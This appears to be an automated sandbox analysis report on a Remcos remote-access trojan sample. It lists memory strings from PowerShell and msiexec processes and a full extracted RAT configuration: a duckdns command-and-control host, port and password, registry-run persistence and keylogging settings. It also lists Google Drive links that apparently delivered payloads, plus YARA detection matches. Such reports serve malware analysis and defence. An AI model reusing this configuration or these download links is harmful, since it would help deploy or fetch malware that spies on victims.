Source: 00000008.00000002.2452849140.00000000046BD000.00000004.00000020.00020000.00000000.sdmp |
Malware Configuration Extractor: Remcos {"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Rmc-WDQFG0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"} |
Source: powershell.exe, 00000001.00000002.2070849929.000001E5698D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000001.00000002.2070849929.000001E569785000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000001.00000002.2107886450.000001E577A32000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000001.00000002.2070849929.000001E567BE8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000001.00000002.2070849929.000001E5679C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2456593952.0000000004921000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000001.00000002.2070849929.000001E567BE8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000001.00000002.2070849929.000001E5679C1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000006.00000002.2456593952.0000000004921000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lBfq |
Source: powershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2400143967.00000000046EE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000001.00000002.2107886450.000001E577A32000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000001.00000002.2107886450.000001E577A32000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000001.00000002.2107886450.000001E577A32000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000001.00000002.2070849929.000001E569698000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googP |
Source: powershell.exe, 00000001.00000002.2070849929.000001E5698D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E569698000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567BE8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: msiexec.exe, 00000008.00000002.2452849140.000000000467A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/ |
Source: msiexec.exe, 00000008.00000002.2452849140.000000000467A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/6 |
Source: powershell.exe, 00000001.00000002.2070849929.000001E567BE8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=12lzUxLYysnAHg12uOMXb7uEyOaJCANHHP |
Source: powershell.exe, 00000006.00000002.2456593952.0000000004A79000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=12lzUxLYysnAHg12uOMXb7uEyOaJCANHHXR |
Source: msiexec.exe, 00000008.00000002.2452849140.000000000467A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2452849140.00000000046BD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2453434788.0000000004A50000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=18-jwgMnSvCSYj0VHz_F9CQMQhWD-8FQ8 |
Source: msiexec.exe, 00000008.00000002.2452849140.000000000467A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=18-jwgMnSvCSYj0VHz_F9CQMQhWD-8FQ8n |
Source: powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E569BA9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: msiexec.exe, 00000008.00000002.2452849140.00000000046D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2435697705.00000000046E3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/ |
Source: powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E569BA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567F59000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=12lzUxLYysnAHg12uOMXb7uEyOaJCANHH&export=download |
Source: msiexec.exe, 00000008.00000003.2400143967.00000000046EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2452849140.00000000046D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2435697705.00000000046E3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=18-jwgMnSvCSYj0VHz_F9CQMQhWD-8FQ8&export=download |
Source: powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com:PSGP |
Source: powershell.exe, 00000001.00000002.2070849929.000001E567BE8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000001.00000002.2070849929.000001E568862000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000001.00000002.2107886450.000001E577A32000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2400143967.00000000046EE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2400143967.00000000046EE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2400143967.00000000046EE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2400143967.00000000046EE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000001.00000002.2070849929.000001E569749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E567E3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2070849929.000001E56976A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2400143967.00000000046EE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: amsi64_3020.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: amsi32_5728.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 3020, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 5728, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |